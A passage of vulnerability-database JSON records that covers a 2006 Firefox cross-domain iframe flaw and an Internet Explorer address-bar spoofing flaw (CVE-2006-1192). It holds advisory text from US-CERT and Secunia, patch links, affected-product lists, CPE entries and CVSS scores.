Please see Adobe Security Bulletin\n APSB07-18 for details. \n\n\nAppendix A. Vendor Information\n\nAdobe\n\n For information about updating affected Adobe products, see Adobe\n Security Bulletin APSB07-18. \n\nAppendix B. References\n\n * Adobe Security Bulletin APSB07-18 -\n \u003chttp://www.adobe.com/support/security/bulletins/apsb07-18.htm\u003e\n \n * Microsoft Security Advisory (943521) -\n \u003chttp://www.microsoft.com/technet/security/advisory/943521.mspx\u003e\n \n * US-CERT Vulnerability Note VU#403150 -\n \u003chttp://www.kb.cert.org/vuls/id/403150\u003e\n\n _________________________________________________________________\n\n The most recent version of this document can be found at:\n\n \u003chttp://www.us-cert.gov/cas/techalerts/TA07-297B.html\u003e\n _________________________________________________________________\n\n Feedback can be directed to US-CERT Technical Staff. Please send\n email to \u003ccert@cert.org\u003e with \"TA07-297B Feedback VU#403150\" in the\n subject. \n _________________________________________________________________\n \n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n _________________________________________________________________\n\n Produced 2007 by US-CERT, a government organization. 
\n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n _________________________________________________________________\n\nRevision History\n\n October 24, 2007: Initial release\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
}
],
"trust": 3.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "SECUNIA",
"id": "26201",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "20449",
"trust": 1.8
},
{
"db": "BID",
"id": "18308",
"trust": 1.7
},
{
"db": "SREASON",
"id": "1059",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-2161",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2006-2900",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "26288",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "26095",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#403150",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#783400",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#143297",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183",
"trust": 0.7
},
{
"db": "FULLDISC",
"id": "20060605 FILE UPLOAD WIDGETS IN IE AND FIREFOX HAVE ISSUES",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-19008",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "47071",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57832",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58191",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58068",
"trust": 0.1
},
{
"db": "USCERT",
"id": "TA07-297B",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "60418",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"id": "VAR-200606-0464",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-19008"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T11:05:26.386000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://secunia.com/advisories/26201/"
},
{
"trust": 1.7,
"url": "http://xs-sniper.com/blog/2007/07/24/remote-command-execution-in-firefox-2005/"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/18308"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-june/046610.html"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/20449"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/1059"
},
{
"trust": 1.6,
"url": "http://xs-sniper.com/blog/remote-command-exec-firefox-2005/"
},
{
"trust": 1.6,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=389580"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/kb/224816"
},
{
"trust": 1.6,
"url": "http://kb.mozillazine.org/firefox_:_faqs_:_about:config_entries"
},
{
"trust": 1.6,
"url": "http://en.wikipedia.org/wiki/uniform_resource_identifier"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/2161"
},
{
"trust": 0.9,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-20.html"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/26095/"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/26288/"
},
{
"trust": 0.8,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0026.html"
},
{
"trust": 0.8,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=382686"
},
{
"trust": 0.8,
"url": "http://www.w3schools.com/tags/tag_iframe.asp"
},
{
"trust": 0.8,
"url": "http://www.w3.org/tr/html401/present/frames.html#h-16.5"
},
{
"trust": 0.8,
"url": "https://addons.mozilla.org/en-us/firefox/addon/722"
},
{
"trust": 0.8,
"url": "http://www.mozilla.org/projects/security/components/same-origin.html"
},
{
"trust": 0.8,
"url": "http://www.cert.org/archive/pdf/cross_site_scripting.pdf"
},
{
"trust": 0.8,
"url": "http://www.stopbadware.org/home/security#preventing"
},
{
"trust": 0.8,
"url": "http://www.antiphishing.org/consumer_recs.html"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/reading_room/securing_browser/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms07-061.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/943521.mspx"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/msrc/archive/2007/10/25/msrc-blog-october-25th-update-to-security-advisory-943521.aspx"
},
{
"trust": 0.8,
"url": "http://www.adobe.com/support/security/advisories/apsa07-04.html"
},
{
"trust": 0.8,
"url": "http://www.adobe.com/support/security/bulletins/apsb07-18.html"
},
{
"trust": 0.8,
"url": "http://en-us.www.mozilla.com/en-us/firefox/2.0.0.6/releasenotes/"
},
{
"trust": 0.8,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=389106"
},
{
"trust": 0.8,
"url": "http://www.w3schools.com/tags/ref_urlencode.asp"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/2161"
},
{
"trust": 0.4,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.4,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.4,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.2,
"url": "http://secunia.com/product/12434/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/20449/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/20442/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-18.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-25.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/21906/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-19.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-21.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/projects/seamonkey/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.com/en-us/firefox/"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-27.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.com/en-us/thunderbird/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14383/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14070/"
},
{
"trust": 0.1,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=388121"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-26.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1173/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/22/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1174/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1176/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1175/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/783400"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12366/"
},
{
"trust": 0.1,
"url": "http://msinfluentials.com/blogs/jesper/archive/2007/07/20/hey-mozilla-quotes-are-not-legal-in-a-url.aspx"
},
{
"trust": 0.1,
"url": "http://www.adobe.com/support/security/bulletins/apsb07-18.htm\u003e"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/technet/security/advisory/943521.mspx\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/403150\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta07-297b.html\u003e"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-08T00:00:00",
"db": "CERT/CC",
"id": "VU#143297"
},
{
"date": "2007-07-27T00:00:00",
"db": "CERT/CC",
"id": "VU#403150"
},
{
"date": "2007-07-26T00:00:00",
"db": "CERT/CC",
"id": "VU#783400"
},
{
"date": "2006-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-19008"
},
{
"date": "2006-06-10T05:36:59",
"db": "PACKETSTORM",
"id": "47071"
},
{
"date": "2007-07-19T02:44:59",
"db": "PACKETSTORM",
"id": "57832"
},
{
"date": "2007-08-01T00:35:42",
"db": "PACKETSTORM",
"id": "58191"
},
{
"date": "2007-07-27T03:17:23",
"db": "PACKETSTORM",
"id": "58068"
},
{
"date": "2007-10-25T04:18:19",
"db": "PACKETSTORM",
"id": "60418"
},
{
"date": "2006-06-07T16:02:00",
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"date": "2006-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-14T00:00:00",
"db": "CERT/CC",
"id": "VU#143297"
},
{
"date": "2007-11-13T00:00:00",
"db": "CERT/CC",
"id": "VU#403150"
},
{
"date": "2007-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#783400"
},
{
"date": "2011-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-19008"
},
{
"date": "2011-10-11T04:00:00",
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"date": "2006-08-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mozilla Firefox allows cross-domain iframe access via JavaScript",
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
],
"trust": 0.6
}
}
VAR-200604-0205
Vulnerability from variot - Updated: 2023-12-18 11:04
Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability." NOTE: this is a different vulnerability than CVE-2006-1626. Microsoft Internet Explorer is prone to address-bar spoofing. Attackers may exploit this via a malicious web page to spoof the contents of a page that the victim may trust. This vulnerability may be useful in phishing or other attacks that rely on content spoofing.
TITLE: Internet Explorer Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA18957
VERIFY ADVISORY: http://secunia.com/advisories/18957/
CRITICAL: Highly critical
IMPACT: Spoofing, System access, Cross Site Scripting
WHERE: From remote
SOFTWARE: Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/ Microsoft Internet Explorer 6.x http://secunia.com/product/11/
DESCRIPTION: Multiple vulnerabilities have been reported in Internet Explorer, which can be exploited by malicious people to conduct cross-site scripting attacks, conduct phishing attacks, or compromise a user's system.
1) An error in the cross-domain restriction when accessing properties of certain dynamically created objects can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an arbitrary site via a JavaScript URI handler applied on a dynamically created "object" tag.
2) An error within the handling of multiple event handlers (e.g. onLoad) in an HTML element can be exploited to corrupt memory in a way that may allow execution of arbitrary code.
3) An error within the parsing of specially crafted, non-valid HTML can be exploited to corrupt memory in a way that allows execution of arbitrary code when a malicious HTML document is viewed.
4) An error within the instantiation of COM objects that are not intended to be instantiated in Internet Explorer can be exploited to corrupt memory in a way that allows execution of arbitrary code.
5) An error within the handling of HTML elements containing a specially crafted tag can be exploited to corrupt memory in a way that allows execution of arbitrary code.
6) An error within the handling of double-byte characters in specially crafted URLs can be exploited to corrupt memory in a way that allows execution of arbitrary code.
Successful exploitation requires that the system uses double-byte character sets.
7) An error in the way IOleClientSite information is returned when an embedded object is dynamically created can be exploited to execute arbitrary code in context of another site or security zone.
8) An unspecified error can be exploited to spoof information displayed in the address bar and other parts of the trust UI.
9) Some unspecified vulnerabilities exist in the two ActiveX controls included with Danim.dll and Dxtmsft.dll.
SOLUTION: Apply patches.
Internet Explorer 5.01 SP4 on Windows 2000 SP4: http://www.microsoft.com/downloa...7B87-AF8F-4346-9164-596E3E5C22B1
Internet Explorer 6 SP1 on Windows 2000 SP4 or Windows XP SP1: http://www.microsoft.com/downloa...41E1-2B36-4696-987A-099FC57E0129
Internet Explorer 6 for Windows XP SP2: http://www.microsoft.com/downloa...FB31-E6B4-4771-81F1-4ACCEBF72133
Internet Explorer 6 for Windows Server 2003 and Windows Server 2003 SP1: http://www.microsoft.com/downloa...6871-D217-41D3-BECC-B27FAFA00054
Internet Explorer 6 for Windows Server 2003 for Itanium-based systems and Windows Server 2003 with SP1 for Itanium-based systems: http://www.microsoft.com/downloa...957C-0ABE-4129-ABAF-AA2852AD62A3
Internet Explorer 6 for Windows Server 2003 x64 Edition: http://www.microsoft.com/downloa...8BE3-39EE-4937-9BD1-280FC35125C6
Internet Explorer 6 for Windows XP Professional x64 Edition: http://www.microsoft.com/downloa...FE3E-620A-4BBC-868B-CA2D9EFF7AC3
Internet Explorer 6 SP1 on Windows 98, Windows 98 SE, or Windows ME: Patches are available via the Microsoft Update Web site or the Windows Update Web site.
PROVIDED AND/OR DISCOVERED BY: 1) Discovered by anonymous person. 2) Michal Zalewski 3) The vendor credits Jan P. Monsch, Compass Security Network Computing. 4) The vendor credits Richard M. Smith, Boston Software Forensics. 5) The vendor credits Thomas Waldegger. 6) The vendor credits Sowhat, Nevis Labs. 7) The vendor credits Heiko Schultze, SAP. 9) The vendor credits Will Dormann, CERT/CC.
ORIGINAL ADVISORY: MS06-013 (KB912812): http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-200604-0205",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "internet explorer",
"scope": "eq",
"trust": 1.8,
"vendor": "microsoft",
"version": "6"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "ie",
"scope": "eq",
"trust": 1.6,
"vendor": "microsoft",
"version": "6"
},
{
"model": "network camera server vb101",
"scope": "eq",
"trust": 1.0,
"vendor": "canon",
"version": "*"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "5.01"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 for itanium-based systems"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows server 2003 x64 edition"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.8,
"vendor": "microsoft",
"version": "6 for windows xp professional x64 edition"
},
{
"model": "internet explorer sp4",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp3",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer for windows nt",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.14.0"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.198"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.195"
},
{
"model": "internet explorer for windows",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.12000"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "5.0.1"
},
{
"model": "internet explorer sp2 do not use",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0-"
},
{
"model": "internet explorer sp1",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
},
{
"model": "internet explorer",
"scope": "eq",
"trust": 0.3,
"vendor": "microsoft",
"version": "6.0"
}
],
"sources": [
{
"db": "BID",
"id": "17460"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:*:windows_xp_professional_64bit:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:internet_explorer:6:sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_server_2003_sp1_itanium_systems:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:sp1:windows_xpsp1:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:5.01:windows_2000_sp4:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:microsoft:ie:6:windows_xp_sp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:canon:network_camera_server_vb101:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2006-1192"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Microsoft",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
],
"trust": 0.6
},
"cve": "CVE-2006-1192",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 4.9,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "LOW",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "High",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 2.6,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2006-1192",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Low",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"exploitabilityScore": 4.9,
"id": "VHN-17300",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:N/AC:H/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2006-1192",
"trust": 1.8,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-200604-160",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-17300",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-17300"
},
{
"db": "JVNDB",
"id": "JVNDB-2006-000178"
},
{
"db": "NVD",
"id": "CVE-2006-1192"
},
{
"db": "CNNVD",
"id": "CNNVD-200604-160"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
